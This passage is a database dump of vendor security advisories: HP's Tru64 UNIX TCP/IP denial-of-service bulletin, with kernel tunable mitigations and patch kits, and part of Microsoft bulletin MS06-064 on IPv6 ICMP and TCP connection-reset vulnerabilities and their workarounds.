visit:\r\nhttp://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters of the\r\nBulletin number in the title:\r\n\r\n GN = HP General SW,\r\n MA = HP Management Agents,\r\n MI = Misc. 3rd party SW,\r\n MP = HP MPE/iX,\r\n NS = HP NonStop Servers,\r\n OV = HP OpenVMS,\r\n PI = HP Printing & Imaging,\r\n ST = HP Storage SW,\r\n TL = HP Trusted Linux,\r\n TU = HP Tru64 UNIX,\r\n UX = HP-UX,\r\n VV = HP Virtual Vault\r\n\r\n\r\nSystem management and security procedures must be reviewed\r\nfrequently to maintain system integrity. HP is continually\r\nreviewing and enhancing the security features of software products\r\nto provide customers with current secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to\r\nbring to the attention of users of the affected HP products the\r\nimportant security information contained in this Bulletin. HP\r\nrecommends that all users determine the applicability of this\r\ninformation to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily\r\naccurate or complete for all user situations and, consequently, HP\r\nwill not be responsible for any damages resulting from user's use\r\nor disregard of the information provided in this Bulletin. To the\r\nextent permitted by law, HP disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability\r\nand fitness for a particular purpose, title and non-infringement."\r\n\r\n\r\n(c)Copyright 2005 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or\r\neditorial errors or omissions contained herein. The information\r\nprovided is provided "as is" without warranty of any kind. 
To the\r\nextent permitted by law, neither HP nor its affiliates,\r\nsubcontractors or suppliers will be liable for incidental, special\r\nor consequential damages including downtime cost; lost profits;\r\ndamages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration.\r\nThe information in this document is subject to change without\r\nnotice. Hewlett-Packard Company and the names of Hewlett-Packard\r\nproducts referenced herein are trademarks of Hewlett-Packard\r\nCompany in the United States and other countries. Other product\r\nand company names mentioned herein may be trademarks of their\r\nrespective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.1\r\n\r\niQA/AwUBQ5bhOOAfOvwtKn1ZEQKzSgCg1iC5rsS3fg+NdLRiEgXs1RLFHtMAoI8f\r\n7aOaCbh4wQ3lzcx/PDVZn5Cz\r\n=wJMN\r\n-----END PGP SIGNATURE-----", "edition": 1, "cvss3": {}, "published": "2005-12-08T00:00:00", "title": "[security bulletin] SSRT4884 HP-UX TCP/IP Remote Denial of Service (DoS)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2004-0791", "CVE-2004-0790", "CVE-2004-1060"], "modified": "2005-12-08T00:00:00", "id": "SECURITYVULNS:DOC:10568", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:10568", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:13", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nHP SECURITY BULLETIN\r\n\r\nHPSBTU01210 REVISION: 0\r\n\r\nSSRT4743, SSRT4884 rev.0 - HP Tru64 UNIX TCP/IP remote Denial of\r\n Service (DoS)\r\n\r\nNOTICE:\r\nThere are no restrictions for distribution of this Security\r\nBulletin provided that it remains complete and intact.\r\n\r\nThe information in this Security Bulletin should be acted upon\r\nas soon as possible.\r\n\r\nINITIAL RELEASE:\r\n15 July 2005\r\n\r\nPOTENTIAL SECURITY IMPACT:\r\nRemote Denial of Service 
(DoS)\r\n\r\nSOURCE:\r\nHewlett-Packard Company\r\nHP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY:\r\nSeveral potential security vulnerabilities have been identified\r\nin the HP Tru64 UNIX TCP/IP including ICMP, and Initial Sequence\r\nNumber generation (ISNs). These exploits could result in a remote\r\nDenial of Service (DoS) from network throughput reduction for\r\nTCP connections, the reset of TCP connections, or TCP spoofing.\r\n\r\nREFERENCES:\r\nCERT CA-2001-09, NISCC Vulnerability Advisory VU#498440 VU#532967,\r\nCAN-2004-0790 CAN-2004-0791 CAN-2004-1060 CAN-2001-0328\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Tru64 UNIX 5.1B-3\r\nHP Tru64 UNIX 5.1B-2/PK4\r\nHP Tru64 UNIX 5.1A PK\r\nHP Tru64 UNIX 4.0G PK4\r\nHP Tru64 UNIX 4.0F PK8\r\n\r\nBACKGROUND:\r\n\r\nSpecial Instructions for the Customer\r\n\r\nThe Internet Control Message Protocol (ICMP) (RFC 792) is used in\r\nthe Internet Architecture to perform fault-isolation and recovery\r\n(RFC816), which is the group of actions that hosts and routers\r\ntake to determine if a network failure has occurred.\r\n\r\nThe industry standard TCP specification (RFC 793) has a\r\nvulnerability whereby ICMP packets can be used to perform a\r\nvariety of attacks such as blind connection reset attacks and\r\nblind throughput-reduction attacks. Blind connection reset\r\nattacks can be triggered by an attacker sending forged ICMP\r\n"Destination Unreachable, host unreachable" packets or ICMP\r\n"Destination Unreachable, port unreachable" packets. Blind\r\nthroughput-reduction attacks can be caused by an attacker sending\r\na forged ICMP type 4 (Source Quench) packet.\r\n\r\nPath MTU Discovery (RFC 1191) describes a technique for\r\ndynamically discovering the MTU (maximum transmission unit) of an\r\narbitrary internet path. This protocol uses ICMP packets from\r\nthe router to discover the MTU for a TCP connection path. 
An\r\nattacker can reduce the throughput of a TCP connection by sending\r\nforged ICMP packets (or their IPv6 counterpart) to the\r\ndiscovering host, causing an incorrect Path MTU setting.\r\n\r\nHP has addressed these potential vulnerabilities by providing a\r\nnew kernel tunable in Tru64 UNIX V5.1B and 5.1A,\r\nicmp_tcpseqcheck. In Tru64 4.0F and 4.0G, HP has introduced two\r\nnew kernel tunables, icmp_tcpseqcheck and icmp_rejectcodemask.\r\nThe icmp_rejectcodemask tunable is already available in Tru64\r\nUNIX V5.1B and 5.1A.\r\n\r\nicmp_tcpseqcheck\r\n\r\nThe icmp_tcpseqcheck variable mitigates ICMP attacks against TCP\r\nby checking that the TCP sequence number contained in the payload\r\nof the ICMP error message is within the range of the data already\r\nsent but not yet acknowledged. An ICMP error message that does\r\nnot pass this check is discarded. This behavior protects TCP\r\nagainst spoofed ICMP packets.\r\n\r\nSet the tunable as follows:\r\n\r\n icmp_tcpseqcheck=1 (default)\r\n\r\n Provides a level of protection that reduces the possibility\r\n of considering a spoofed ICMP packet as valid\r\n to one in two raised to the thirty-second power.\r\n\r\n icmp_tcpseqcheck=0\r\n\r\n Retains existing behavior, i.e., accepts all ICMP packets\r\n\r\nicmp_rejectcodemask\r\n\r\nIn the Requirements for IP Version 4 Routers (RFC 1812), research\r\nsuggests that the use of ICMP Source Quench packets is an\r\nineffective (and unfair) antidote for congestion. Thus, HP\r\nrecommends completely ignoring ICMP Source Quench packets using\r\nthe icmp_rejectcodemask tunable. The icmp_rejectcodemask is a\r\nbitmask that designates the ICMP codes that the system should\r\nreject. 
For example, to reject ICMP Source Quench packets,\r\nset the bit whose position is the ICMP_SOURCEQUENCH type\r\nnumber, 4: two to the 4th power = 16 (0x10 hex).\r\nThe icmp_rejectcodemask tunable can be used to reject any\r\nICMP packet type, and bits can be ORed together to reject\r\nmore than one type (for example, 0x30 rejects both Source\r\nQuench, type 4, and Redirect, type 5).\r\n\r\nNote: the ICMP type numbers are defined in\r\n "/usr/include/netinet/ip_icmp.h".\r\n\r\n Set the tunable as follows:\r\n\r\n icmp_rejectcodemask = 0x10\r\n\r\n Rejects ICMP Source Quench packets\r\n\r\n icmp_rejectcodemask = 0 (default)\r\n\r\n Retains existing behavior, i.e., accepts all ICMP packets\r\n\r\nAdjusting the variables\r\n\r\nThe ICMP sequence check variable (icmp_tcpseqcheck) can be\r\nadjusted using the sysconfig and sysconfigdb commands. A change\r\nmade with sysconfig -r takes effect in the running kernel\r\nimmediately but is lost at reboot; merging the queried value into\r\nthe inet stanza with sysconfigdb -m makes it persistent, so\r\nquery the value you want to keep before merging:\r\n\r\n# sysconfig -q inet icmp_tcpseqcheck\r\ninet:\r\nicmp_tcpseqcheck = 0\r\n# sysconfig -r inet icmp_tcpseqcheck=1\r\nicmp_tcpseqcheck: reconfigured\r\n# sysconfig -q inet icmp_tcpseqcheck\r\ninet:\r\nicmp_tcpseqcheck = 1\r\n# sysconfig -q inet icmp_tcpseqcheck > /tmp/icmp_tcpseqcheck_merge\r\n# sysconfigdb -m -f /tmp/icmp_tcpseqcheck_merge inet\r\n# sysconfigdb -l inet\r\n\r\ninet:\r\n icmp_tcpseqcheck = 1\r\n\r\nSimilarly, the icmp_rejectcodemask variable can be adjusted using\r\nthe sysconfig and sysconfigdb commands (sysconfig accepts the\r\nhexadecimal form and reports the value back in decimal):\r\n\r\n# sysconfig -q inet icmp_rejectcodemask\r\ninet:\r\nicmp_rejectcodemask = 0\r\n# sysconfig -r inet icmp_rejectcodemask=0x10\r\nicmp_rejectcodemask: reconfigured\r\n# sysconfig -q inet icmp_rejectcodemask\r\ninet:\r\nicmp_rejectcodemask = 16\r\n# sysconfig -q inet icmp_rejectcodemask > /tmp/icmp_rejectcodemask_merge\r\n# sysconfigdb -m -f /tmp/icmp_rejectcodemask_merge inet\r\n# sysconfigdb -l inet\r\n\r\ninet:\r\n icmp_rejectcodemask = 16\r\n\r\nRESOLUTION:\r\n\r\nUntil the corrections are available in a mainstream\r\nrelease patch kit, HP is releasing the following Early Release\r\nPatch (ERP) kits publicly for use by any customer.\r\n\r\nThe ERP kits use dupatch to 
install and will not install over\r\nany installed Customer Specific Patches (CSPs) that have file\r\nintersections with the ERPs. Contact your service provider for\r\nassistance if the ERP installation is blocked by any of your\r\ninstalled CSPs.\r\n\r\nThe fixes contained in the ERP kits are scheduled to be\r\navailable in the following mainstream patch kits:\r\n\r\n HP Tru64 UNIX 5.1B-4\r\n\r\nEarly Release Patches\r\n\r\nThe ERPs deliver the following file:\r\n\r\n/sys/BINARY/inet.mod\r\n\r\nHP Tru64 UNIX 5.1B-3 ERP Kit Name:\r\n T64KIT0025925-V51BB26-ES-20050628\r\nKit Location:\r\n http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=T64KIT0025925-V51BB26-ES-20050628\r\nMD5 checksum: 129251787a426320af16cd584b982027\r\n\r\nHP Tru64 UNIX 5.1B-2/PK4 ERP Kit Name:\r\n T64KIT0025924-V51BB25-ES-20050628\r\nKit Location:\r\n http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=T64KIT0025924-V51BB25-ES-20050628\r\nMD5 checksum: 5fcc77a6876db6d10ef07ac96e11b3af\r\n\r\nHP Tru64 UNIX 5.1A PK6 ERP Kit Name:\r\n T64KIT0025922-V51AB24-ES-20050628\r\nKit Location:\r\n http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=T64KIT0025922-V51AB24-ES-20050628\r\nMD5 checksum: 7c373b35c95945651a1cfda96bf71421\r\n\r\nHP Tru64 UNIX 4.0G PK4 ERP Kit Name:\r\n T64KIT0025920-V40GB22-ES-20050628\r\nKit Location:\r\n http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=T64KIT0025920-V40GB22-ES-20050628\r\nMD5 checksum: 13849fd555239d75d300d1cb46dc995f\r\n\r\nHP Tru64 UNIX 4.0F PK8 ERP Kit Name:\r\n DUXKIT0025921-V40FB22-ES-20050628\r\nKit Location:\r\n http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=DUXKIT0025921-V40FB22-ES-20050628\r\nMD5 checksum: 743b614d39f185802701b7f2dd14ffa5\r\n\r\nVerify the MD5 checksum of each downloaded kit against the value\r\nlisted above before installing it. MD5 checksums are also\r\navailable from the ITRC patch database main page:\r\n http://www.itrc.hp.com/service/patch/mainPage.do\r\nFrom the patch database main page, click Tru64 UNIX,\r\nthen click verifying MD5 checksums under useful 
links.\r\n\r\nGeneral ITRC Patch Page:\r\nhttp://www.itrc.hp.com/service/patch/mainPage.do\r\n\r\nSUPPORT: For further information, contact the normal HP Services\r\nsupport channel.\r\n\r\nREPORT: To report a potential security vulnerability with any HP\r\nsupported product, send Email to: security-alert@hp.com. It is\r\nstrongly recommended that security related information being\r\ncommunicated to HP be encrypted using PGP, especially exploit\r\ninformation. To obtain the security-alert PGP key please send an\r\ne-mail message to security-alert@hp.com with the Subject of\r\n'get key' (no quotes).\r\n\r\nSUBSCRIBE: To initiate a subscription to receive future HP\r\nSecurity Bulletins via Email:\r\n\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\n\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n - check ALL categories for which alerts are required and\r\n continue.\r\nUnder Step2: your ITRC operating systems\r\n - verify your operating system selections are checked and\r\n save.\r\n\r\nTo update an existing subscription:\r\nhttp://h30046.www3.hp.com/subSignIn.php\r\n\r\nLog in on the web page\r\n Subscriber's choice for Business: sign-in.\r\nOn the Web page:\r\n Subscriber's Choice: your profile summary\r\n - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit:\r\nhttp://itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\n relates to is represented by the 5th and 6th characters of the\r\n Bulletin number:\r\n GN = HP General SW,\r\n MA = HP Management Agents,\r\n MI = Misc. 
3rd party SW,\r\n MP = HP MPE/iX,\r\n NS = HP NonStop Servers,\r\n OV = HP OpenVMS,\r\n PI = HP Printing & Imaging,\r\n ST = HP Storage SW,\r\n TL = HP Trusted Linux,\r\n TU = HP Tru64 UNIX,\r\n UX = HP-UX,\r\n VV = HP Virtual Vault\r\n\r\nSystem management and security procedures must be reviewed\r\nfrequently to maintain system integrity. HP is continually\r\nreviewing and enhancing the security features of software products\r\nto provide customers with current secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to\r\nbring to the attention of users of the affected HP products the\r\nimportant security information contained in this Bulletin. HP\r\nrecommends that all users determine the applicability of this\r\ninformation to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily\r\naccurate or complete for all user situations and, consequently, HP\r\nwill not be responsible for any damages resulting from user's use\r\nor disregard of the information provided in this Bulletin. To the\r\nextent permitted by law, HP disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability\r\nand fitness for a particular purpose, title and non-infringement."\r\n\r\n\r\n(c)Copyright 2005 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or\r\neditorial errors or omissions contained herein. The information\r\nprovided is provided "as is" without warranty of any kind. To the\r\nextent permitted by law, neither HP nor its affiliates,\r\nsubcontractors or suppliers will be liable for incidental, special\r\nor consequential damages including downtime cost; lost profits;\r\ndamages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration.\r\nThe information in this document is subject to change without\r\nnotice. 
Hewlett-Packard Company and the names of Hewlett-Packard\r\nproducts referenced herein are trademarks of Hewlett-Packard\r\nCompany in the United States and other countries. Other product\r\nand company names mentioned herein may be trademarks of their\r\nrespective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: PGP 8.1\r\n\r\niQA/AwUBQtuSLuAfOvwtKn1ZEQJXrwCgpDVfLyXvXZd3sF6bswgQ3DLz5jcAoNt2\r\nAs7Gf9BY697IdlYjIlmrirG1\r\n=143G\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "cvss3": {}, "published": "2005-07-19T00:00:00", "title": "HPSBTU01210 SSRT4743, SSRT4884 rev.0 - HP Tru64 UNIX TCP/IP remote Denial of Service (DoS)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2004-0791", "CVE-2004-0790", "CVE-2004-1060", "CVE-2001-0328"], "modified": "2005-07-19T00:00:00", "id": "SECURITYVULNS:DOC:9226", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9226", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:19", "description": "Microsoft Security Bulletin MS06-064\r\nVulnerabilities in TCP/IP IPv6 Could Allow Denial of Service (922819)\r\nPublished: October 10, 2006\r\n\r\nVersion: 1.0\r\nSummary\r\n\r\nWho Should Read this Document: Customers who use Microsoft Windows.\r\n\r\nImpact of Vulnerability: Denial of Service\r\n\r\nMaximum Severity Rating: Low\r\n\r\nRecommendation: Customers should evaluate whether to apply the security update to the affected systems.\r\n\r\nSecurity Update Replacement: None\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software:\r\n\u2022 Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2 \u2014 Download the update\r\n\u2022 Microsoft Windows XP Professional x64 Edition \u2014 Download the update\r\n\u2022 Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1 \u2014 Download the 
update\r\n\u2022 Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems \u2014 Download the update\r\n\u2022 Microsoft Windows Server 2003 x64 Edition \u2014 Download the update\r\n\r\nNon-Affected Software:\r\n\u2022 Microsoft Windows 2000 Service Pack 4\r\n\r\nThe software in this list has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\n\r\nNote The security updates for Microsoft Windows Server 2003, Windows Server 2003 Service Pack 1, and Windows Server 2003 x64 Edition also apply to Windows Server 2003 R2.\r\n\r\nGeneral Information\r\n\r\nExecutive Summary:\r\n\r\nThis update resolves a publicly disclosed vulnerability as well as additional issues discovered through internal investigations.\r\n\r\nAn attacker who successfully exploited the most severe of these vulnerabilities against an affected system could cause the system to stop responding or automatically reboot.\r\n\r\nWe recommend that customers evaluate whether to apply the security update to the affected systems.\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\n\r\nVulnerability Identifier\tImpact of Vulnerability\tWindows XP Service Pack 1\tWindows XP Service Pack 2\tWindows Server 2003\tWindows Server 2003 Service Pack 1\r\nICMP Connection Reset Vulnerability - CVE-2004-0790\tDenial of Service\tLow\tLow\tLow\tLow\r\nTCP Connection Reset Vulnerability - CVE-2004-0230\tDenial of Service\tLow\tLow\tLow\tLow\r\nSpoofed Connection Request Vulnerability - CVE-2005-0688\tDenial of Service\tLow\tLow\tLow\tLow\r\nAggregate Severity of All Vulnerabilities\t\tLow\tLow\tLow\tLow\r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\n\r\nNote The security updates for Windows Server 2003, Windows Server 2003 Service Pack 1, and Windows Server 2003 x64 Edition also apply to Windows Server 2003 R2.\r\n\r\nNote The severity ratings for non-x86 operating system versions map to the x86 operating system versions as follows:\r\n\u2022 The Windows XP Professional x64 Edition severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\n\u2022 The Windows Server 2003 for Itanium-based Systems severity rating is the same as the Windows Server 2003 severity rating.\r\n\u2022 The Windows Server 2003 with SP1 for Itanium-based Systems severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\n\u2022 The Windows Server 2003 x64 Edition severity rating is the same as the Windows Server 2003 Service Pack 1 severity rating.\r\n\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhy does this update address several reported security vulnerabilities?\r\nThis update addresses several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers can install only this update.\r\n\r\nDoes this security update contain any non-security changes to functionality?\r\nYes. In addition to the changes that are listed in the "Vulnerability Details" section, this update includes the Teredo Interoperability update for Windows XP Service Pack 2. 
Windows Server 2003 does not support Teredo and is not receiving the Teredo functionality change.\r\n\r\nWhat is the Teredo interoperability update?\r\nIANA has allocated a new Teredo prefix 2001:0/32 for Teredo. In order to establish connectivity over Teredo between Windows XP Service Pack 2 IPv6 capable hosts and Windows Vista, the Teredo prefix is being revised on all Windows XP machines. To learn more about Teredo please visit the following Microsoft TechNet documentation. To learn more about the new Teredo prefix, please visit the following RFC documentation.\r\n\r\nDoes this security update make any changes to the IPv4 implementation of TCP/IP?\r\nNo. The security issues addressed by this bulletin have already been resolved in the corresponding IPv4 implementation of TCP/IP with the release of the MS05-019.\r\n\r\nExtended security update support for Microsoft Windows 98, Windows 98 Second Edition, or Windows Millennium Edition ended on July 11, 2006. I am still using one of these operating systems; what should I do?\r\nWindows 98, Windows 98 Second Edition, and Windows Millennium Edition have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nExtended security update support for Microsoft Windows NT Workstation 4.0 Service Pack 6a and Windows 2000 Service Pack 2 ended on June 30, 2004. Extended security update support for Microsoft Windows NT Server 4.0 Service Pack 6a ended on December 31, 2004. Extended security update support for Microsoft Windows 2000 Service Pack 3 ended on June 30, 2005. 
I am still using one of these operating systems; what should I do?\r\nWindows NT Workstation 4.0 Service Pack 6a, Windows NT Server 4.0 Service Pack 6a, Windows 2000 Service Pack 2, and Windows 2000 Service Pack 3 have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nCustomers who require custom support for these products must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. 
For more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\n\r\nCan I use the Microsoft Baseline Security Analyzer (MBSA) to determine whether this update is required?\r\nThe following table provides the MBSA detection summary for this security update.\r\n\r\nProduct\tMBSA 1.2.1\tMBSA 2.0\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2\tYes\tYes\r\nMicrosoft Windows XP Professional x64 Edition\tNo\tYes\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1\tYes\tYes\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems\tNo\tYes\r\nMicrosoft Windows Server 2003 x64 Edition family\tNo\tYes\r\n\r\nFor more information about MBSA, visit the MBSA Web site. For more information about the programs that Microsoft Update and MBSA 2.0 currently do not detect, see Microsoft Knowledge Base Article 895660.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\n\r\nCan I use Systems Management Server (SMS) to determine whether this update is required?\r\nThe following table provides the SMS detection summary for this security update.\r\n\r\nProduct\tSMS 2.0\tSMS 2003\r\nMicrosoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2\tYes\tYes\r\nMicrosoft Windows XP Professional x64 Edition\tNo\tYes\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1\tYes\tYes\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems\tNo\tYes\r\nMicrosoft Windows Server 2003 x64 Edition family\tNo\tYes\r\n\r\nSMS 2.0 and the SMS 2003 Software Update Services (SUS) Feature Pack can use MBSA 1.2.1 for detection and therefore have the same limitation that is listed earlier in this bulletin related to programs that MBSA 1.2.1 does not detect.\r\n\r\nFor more information about SMS, visit the SMS Web site.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\n\r\nVulnerability Details\r\n\r\nICMP Connection Reset Vulnerability - CVE-2004-0790:\r\n\r\nA denial of service vulnerability exists in the IPv6 Windows implementation of the Internet Control Message Protocol (ICMP). An attacker who successfully exploited this vulnerability could cause the affected system to drop an existing TCP connection.\r\n\r\nMitigating Factors for ICMP Connection Reset Vulnerability - CVE-2004-0790:\r\n\u2022 Firewall best practices and firewall or router configurations that block all ICMP traffic can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.\r\n\u2022 IPv6 support is not installed by default on Windows XP Service Pack 1, Windows XP Service Pack 2, Windows Server 2003 and Windows Server 2003 Service Pack 1.\r\n\u2022 An attacker\u2019s system must belong to the same IPv6 network as the target system.\r\n\u2022 An attacker must first predict or discover the IP address and port information of the source and of the destination of an existing TCP network connection.\r\n\u2022 This attack would have to be performed on each TCP connection that was targeted for reset. 
Many applications will automatically restore connections that have been reset.\r\n\r\nWorkarounds for ICMP Connection Reset Vulnerability - CVE-2004-0790:\r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\u2022 Uninstall IPv6.\r\n\r\nFor the IPv6 protocol for Windows XP with SP2, Windows XP with SP1, or Windows Server 2003, do the following:\r\n\r\n1. Log on to the computer with a user account that has privileges to change network configuration.\r\n2. Click Start, click Control Panel, and then double-click Network Connections.\r\n3. Click Microsoft TCP/IP version 6 (for Windows XP with SP2 or Windows Server 2003) or Microsoft IPv6 Developer Edition (for Windows XP with SP1), and then click Uninstall.\r\n4. When prompted to confirm the removal of the Microsoft IPv6 Developer Edition or Microsoft TCP/IP version 6 protocol, click OK.\r\n\r\nAlternately, from the Windows XP or Windows Server 2003 desktop do the following:\r\n\r\n1. Click Start, point to Programs, point to Accessories.\r\n2. Click Command Prompt.\r\n3. At the command prompt, type netsh interface ipv6 uninstall.\r\n\r\nImpact of Workaround: Uninstalling IPv6 would result in the system not being able to communicate with other hosts on an IPv6 configured network.\r\n\u2022 Block all ICMP network packets at the firewall or at the router:\r\n\r\nICMP network packets are the vector used to attack the affected component. Blocking them at the firewall or at the router will help protect systems that are behind that firewall or router from attempts to exploit this vulnerability. 
We recommend that you block all unsolicited inbound communication from the Internet.\r\n\r\nImpact of Workaround: This workaround can also negatively impact performance by preventing TCP from optimizing network communication. Path MTU Discovery relies on ICMP messages to avoid fragmentation at routers connecting networks with different MTUs; fragmentation reduces TCP throughput and increases network congestion. Note also that on IPv6, Neighbor Discovery and Router Advertisement are themselves ICMPv6 messages, so a filter that drops all ICMPv6 on the host or on the local link breaks IPv6 connectivity altogether; restrict the filter to the error message types, or to packets arriving from off-link sources.\r\n\r\nNote: Windows XP Service Pack 1 Firewall is unable to handle IPv6 network traffic. In order to ensure protection for your Windows XP Service Pack 1 system using the Internet Connection Firewall you should apply the update identified in KB Article 817778 \u201cOverview of the Advanced Networking Pack for Windows XP\u201d.\r\n\u2022 Block ICMP traffic by using IPSec on the affected systems.\r\n\r\nUse Internet Protocol security (IPSec) to help protect network communications. Detailed information about IPSec and about how to apply filters is available in Microsoft Knowledge Base Article 313190 and Microsoft Knowledge Base Article 813878.\r\n\r\nImpact of Workaround: The same performance and IPv6 Neighbor Discovery caveats as for blocking ICMP at the firewall apply to a host-based IPSec filter.\r\n\r\nFAQ for ICMP Connection Reset Vulnerability - CVE-2004-0790:\r\n\r\nWhat is the scope of the vulnerability?\r\n\r\nA denial of service vulnerability exists in Windows in the IPv6 implementation of the Internet Control Message Protocol (ICMP). 
An attacker who successfully exploited this vulnerability could cause the affected system to drop an existing TCP connection.\r\n\r\nWhat causes the vulnerability?\r\nThe stack acts on ICMP error messages that it should have rejected as not belonging to the connection they claim to describe, so a forged message can cause the reset of an existing connection.\r\n\r\nWhat is IPv6?\r\nInternet Protocol version 6 (IPv6), a new suite of standard protocols for the network layer of the Internet, is built into Microsoft Windows XP and later. IPv6 is designed to solve many of the problems of the current version of IP (known as IPv4) such as address depletion, security, autoconfiguration, and extensibility. To learn more about IPv6, please read the following Microsoft FAQ for IPv6.\r\n\r\nWhat is TCP/IP?\r\nTCP/IP is a set of networking protocols. TCP/IP includes standards for how computers communicate and conventions for connecting networks and for routing traffic. For more information about TCP/IP, see the following Microsoft Web site.\r\n\r\nWhat is ICMP?\r\nInternet Control Message Protocol (ICMP) is a required TCP/IP standard, defined in RFC 792 ("Internet Control Message Protocol"). Hosts and routers that use IP communication can report errors and exchange limited control and status information using ICMP.\r\n\r\nICMP messages are usually sent automatically in one of the following situations:\r\n\u2022 An IP datagram cannot reach its destination.\r\n\u2022 An IP router (gateway) cannot forward datagrams at the current rate of transmission.\r\n\u2022 An IP router redirects the sending host to a better route to the destination.\r\n\r\nYou can use the ping command to send ICMP echo request messages and to record the receipt of ICMP echo reply messages. By using these messages, you can detect network or host communication failures and troubleshoot common TCP/IP connectivity problems. 
For more information about ICMP, see the following Microsoft Web site.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who exploited this vulnerability could cause the affected system to reset TCP connections.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system could try to exploit this vulnerability. An attacker\u2019s system must belong to the same IPv6 network as a target system.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could exploit the vulnerability by creating a specially crafted message and sending the message to an affected system. The message could then cause the affected system to reset TCP network connections.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nAll affected operating systems are at risk from this vulnerability. However, servers are at primary risk from this vulnerability because they maintain connections with clients that could be vulnerable to the connection reset.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. An attacker could try to exploit this vulnerability over the Internet. By default, the Microsoft Internet Connection Firewall (ICF) in Windows XP Service Pack 1 and in Windows Server 2003 allows these kinds of network packets and cannot filter them. The firewall component in Windows XP 